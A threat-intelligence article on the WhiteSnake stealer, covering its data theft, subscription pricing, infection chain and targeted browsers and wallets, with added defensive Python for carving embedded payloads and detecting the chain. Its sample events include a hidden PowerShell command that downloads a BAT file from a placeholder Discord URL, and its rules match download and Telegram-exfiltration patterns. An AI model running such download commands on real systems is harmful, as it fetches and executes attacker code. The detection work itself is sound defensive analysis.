The Cyble Research and Intelligence Labs (CRIL) has recently discovered a new malware named the “WhiteSnake” Stealer. This malicious software can cause substantial damage by stealing sensitive information from compromised systems.
Earlier this month, the WhiteSnake Stealer was spotted on cybercrime forums for the first time. It is offered in versions built for both major operating systems, Windows and Linux.
The WhiteSnake Stealer is a serious threat that could compromise sensitive information on both Windows and Linux operating systems. It is concerning that the malware has already been identified on cybercrime forums, which suggests that it is actively being used by cybercriminals.
To protect against this threat, it is essential to ensure that all software and operating systems are kept up to date with the latest security patches. Additionally, users should be cautious when opening emails or downloading attachments from unknown sources, as this is a common method for delivering malware.
It is also recommended to have robust antivirus and anti-malware software installed on all systems and to conduct regular security audits to identify and address vulnerabilities. Finally, it is crucial to educate users on safe online practices and to remain vigilant in monitoring for any suspicious activity.
Capabilities of WhiteSnake Stealer
The stealer can collect a wide range of sensitive data, including:-
- Passwords
- Cookies
- Credit card numbers
- Debit card numbers
- Screenshots
- Other personal data
- Other financial data
The stealer compresses the stolen files and sends them through a Telegram bot as soon as collection finishes. Because the info stealer is still under development, its operators update it on a daily basis.
Pricing of Malware
Below is a list of the prices for WhiteSnake Stealer with their respective validity periods:-
- $120 / 1 month
- $300 / 3 months
- $500 / 6 months
- $900 / 1 year
- $1500 / Lifetime
Linux Version and Infection Chain
Cybercriminals recently shared a screenshot of an advertisement revealing that the WhiteSnake Stealer is now available for Linux. Notably, the Linux version offers the same range of features and capabilities as the Windows version.
The Linux stealer binary is relatively small, at just 5KB, and it ships with file extensions such as:-
- .py
- .sh
The infection chain begins with a spam email that delivers the payload as an executable file disguised as a harmless PDF document.
The executable was produced from a BAT file with the “Bat2Exe” converter. When the user runs it, it drops a BAT file (“tmp46D2.tmp.bat”) into the %temp% folder.
Executing that BAT file launches a PowerShell script, which in turn downloads a second BAT file named “build.bat” from a URL hosted on the Discord platform.
When “build.bat” is opened in a text editor it shows only traditional Chinese characters, an obfuscation layer. Once decoded, the BAT file contains an executable binary encoded in Base64 and placed between digital certificate blocks.
The decoded output is written to the %temp% folder as a binary executable named “build.exe”.
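As an added analyst helper (not code from the Cyble report and not part of the malware), here is a small Python carver for the stage just described: it pulls the Base64 blob out from between certificate markers in a decoded BAT file, checks whether the result is a PE image, and reports its machine type and SHA-256. The `-----BEGIN CERTIFICATE-----` markers are an assumption (the report only says the payload sits "between digital certificates"), the function names are mine, and the embedded sample is a constructed bare PE header rather than the real dropper.

```python
import base64
import hashlib
import re
import struct
import textwrap
from typing import List, Optional

# Marker strings are an assumption: the report only says the Base64 payload
# sits "between digital certificates" inside the decoded BAT file.
CERT_BLOCK = re.compile(
    r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", re.S
)

# IMAGE_FILE_MACHINE values from the PE/COFF specification.
MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C0: "ARM", 0xAA64: "ARM64"}


def identify_pe(blob: bytes) -> Optional[dict]:
    """Return basic PE facts if blob carries a valid MZ/PE header, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", blob, 0x3C)
    if e_lfanew + 6 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    (machine,) = struct.unpack_from("<H", blob, e_lfanew + 4)
    return {
        "machine": MACHINE_NAMES.get(machine, f"0x{machine:04x}"),
        "size": len(blob),
        "sha256": hashlib.sha256(blob).hexdigest(),
    }


def carve_embedded_pe(bat_text: str) -> List[dict]:
    """Decode every certificate block in a BAT file and keep those that are PE images."""
    found = []
    for body in CERT_BLOCK.findall(bat_text):
        cleaned = re.sub(r"[^A-Za-z0-9+/=]", "", body)  # drop CRLF and stray characters
        try:
            blob = base64.b64decode(cleaned, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        info = identify_pe(blob)
        if info:
            found.append(info)
    return found


def _fake_pe() -> bytes:
    """Constructed stand-in for a dropped binary: a bare MZ + PE header, nothing more."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3A)              # DOS header up to e_lfanew
    hdr += struct.pack("<I", 0x80)                        # e_lfanew -> PE header at 0x80
    hdr += b"\x00" * (0x80 - len(hdr))
    hdr += b"PE\x00\x00" + struct.pack("<HH", 0x014C, 0)  # signature, machine=i386, 0 sections
    return bytes(hdr) + b"\x00" * 32


# Constructed sample of a decoded BAT file; the payload is the fake header above,
# not the real WhiteSnake dropper.
SAMPLE_BAT = (
    "@echo off\r\n"
    "rem constructed sample for the carver, not a real dropper\r\n"
    "-----BEGIN CERTIFICATE-----\r\n"
    + "\r\n".join(textwrap.wrap(base64.b64encode(_fake_pe()).decode(), 64))
    + "\r\n-----END CERTIFICATE-----\r\n"
)

if __name__ == "__main__":
    for pe in carve_embedded_pe(SAMPLE_BAT):
        print(f"embedded PE: {pe['machine']}, {pe['size']} bytes, sha256={pe['sha256']}")
```

Run it against a decoded `build.bat` captured in a sandbox to get a hash for the dropped binary without ever executing it; the same loop handles several certificate blocks in one file, since only blocks that decode to a PE header are reported.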
The WhiteSnake Stealer is a 32-bit .NET GUI executable, disguised as the “build.exe” payload.
Running “build.exe” creates a mutex named “kwnmsgyyay”, which limits the malware to a single running instance on the targeted system.
Once the mutex is in place, the malware calls its AntiVM() function, which tries to prevent the malware from running inside a virtualized (analysis) environment.
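To show how a defender would catch the chain above in endpoint telemetry, here is an added Python detection sketch; it is not Cyble's code and is not tied to any product. It runs one rule per observable stage (BAT executed from %temp%, PowerShell fetching a file from Discord, an executable started from %temp%, and a %temp%-resident process contacting the Telegram Bot API, the exfiltration step described earlier) over constructed Sysmon-style process-creation and network-connection events and scores each host. The event field names, the exact PowerShell download command line, and the host, user and file names are constructed assumptions; mutex creation is not in these events because standard process telemetry does not record it.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Path and URL patterns. The Discord download command line is an assumption: the
# report says only that a PowerShell script fetches build.bat from a Discord URL.
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
DISCORD_URL = re.compile(r"https?://(?:cdn\.)?discord(?:app)?\.com/", re.I)
DOWNLOAD_VERB = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b", re.I)


def rule_bat_from_temp(ev: dict) -> bool:
    """cmd.exe launching a .bat that lives in a Temp directory (tmp46D2.tmp.bat stage)."""
    cmd = ev.get("cmdline", "")
    return (ev["event"] == "ProcessCreate"
            and ev["image"].lower().endswith("\\cmd.exe")
            and bool(TEMP_DIR.search(cmd)) and ".bat" in cmd.lower())


def rule_powershell_discord_download(ev: dict) -> bool:
    """PowerShell spawned by cmd.exe pulling a file from Discord (build.bat stage)."""
    cmd = ev.get("cmdline", "")
    return (ev["event"] == "ProcessCreate"
            and "powershell" in ev["image"].lower()
            and ev.get("parent_image", "").lower().endswith("\\cmd.exe")
            and bool(DISCORD_URL.search(cmd)) and bool(DOWNLOAD_VERB.search(cmd)))


def rule_exe_from_temp(ev: dict) -> bool:
    """An executable started from a Temp directory (build.exe stage)."""
    img = ev["image"]
    return (ev["event"] == "ProcessCreate"
            and bool(TEMP_DIR.search(img)) and img.lower().endswith(".exe"))


def rule_telegram_from_temp(ev: dict) -> bool:
    """A Temp-resident process talking to the Telegram Bot API (exfiltration stage)."""
    return (ev["event"] == "NetworkConnect"
            and ev.get("dest_host", "").lower() == "api.telegram.org"
            and bool(TEMP_DIR.search(ev["image"])))


RULES = [
    ("bat_executed_from_temp", rule_bat_from_temp),
    ("powershell_discord_download", rule_powershell_discord_download),
    ("exe_executed_from_temp", rule_exe_from_temp),
    ("telegram_bot_api_from_temp", rule_telegram_from_temp),
]


def assess(events: List[dict]) -> Dict[str, dict]:
    """Per host: which chain stages were seen, and a verdict based on how many."""
    seen: Dict[str, set] = defaultdict(set)
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                seen[ev["host"]].add(name)
    report = {}
    for host in {ev["host"] for ev in events}:
        matched = sorted(seen[host])
        score = len(matched)
        if score >= 3:
            verdict = "chain: likely infostealer infection"
        elif score:
            verdict = "partial: review"
        else:
            verdict = "clean"
        report[host] = {"matched": matched, "score": score, "verdict": verdict}
    return report


# Constructed events (Sysmon-style, simplified). WS01 shows the full chain; WS02 is benign.
SAMPLE_EVENTS = [
    {"host": "WS01", "event": "ProcessCreate", "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Users\alice\Downloads\Invoice.pdf.exe",
     "cmdline": r'cmd /c "C:\Users\alice\AppData\Local\Temp\tmp46D2.tmp.bat"'},
    {"host": "WS01", "event": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'powershell -w hidden -c "Invoke-WebRequest https://cdn.discordapp.com/attachments/PLACEHOLDER/build.bat -OutFile $env:TEMP\build.bat"'},
    {"host": "WS01", "event": "ProcessCreate", "image": r"C:\Users\alice\AppData\Local\Temp\build.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": r"C:\Users\alice\AppData\Local\Temp\build.exe"},
    {"host": "WS01", "event": "NetworkConnect", "image": r"C:\Users\alice\AppData\Local\Temp\build.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"host": "WS02", "event": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"host": "WS02", "event": "NetworkConnect", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "web.telegram.org", "dest_port": 443},
]

if __name__ == "__main__":
    for host, result in sorted(assess(SAMPLE_EVENTS).items()):
        print(host, result["verdict"], result["matched"])
```

Each rule on its own is noisy (plenty of legitimate installers run from %temp%), which is why the verdict is driven by how many stages line up on one host rather than by any single hit; the Telegram rule in particular is the one that separates a scripted download from actual exfiltration.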
Browsers and Cryptocurrency Wallets Affected
The malware steals “Cookies”, “Autofills”, “Login Data”, and “Web Data” from several popular web browsers:-
- Mozilla Firefox
- Google Chrome
- Brave-Browser
- Chromium
- Microsoft Edge
Besides web browsers, the malware also steals important files from a number of cryptocurrency wallets, including:-
- Atomic
- Guarda
- Coinomi
- Bitcoin
- Electrum
- Exodus
The WhiteSnake Stealer also reaches cryptocurrency wallets through their known directories and extracts sensitive information from the browser extensions associated with such wallets.
Recommendations
To reduce the risk from this threat:-
- Avoid downloading pirated software from warez or torrent websites.
- Create strong and unique passwords, do not reuse them, and always enable multi-factor authentication.
- Ensure that the automatic software update feature is turned on.
- Use reputable anti-virus software, and never open links or attachments from untrusted emails.
- Block URLs that could spread malware.
- At the network level, monitor for beaconing traffic to catch command-and-control and exfiltration activity.
Author: Guru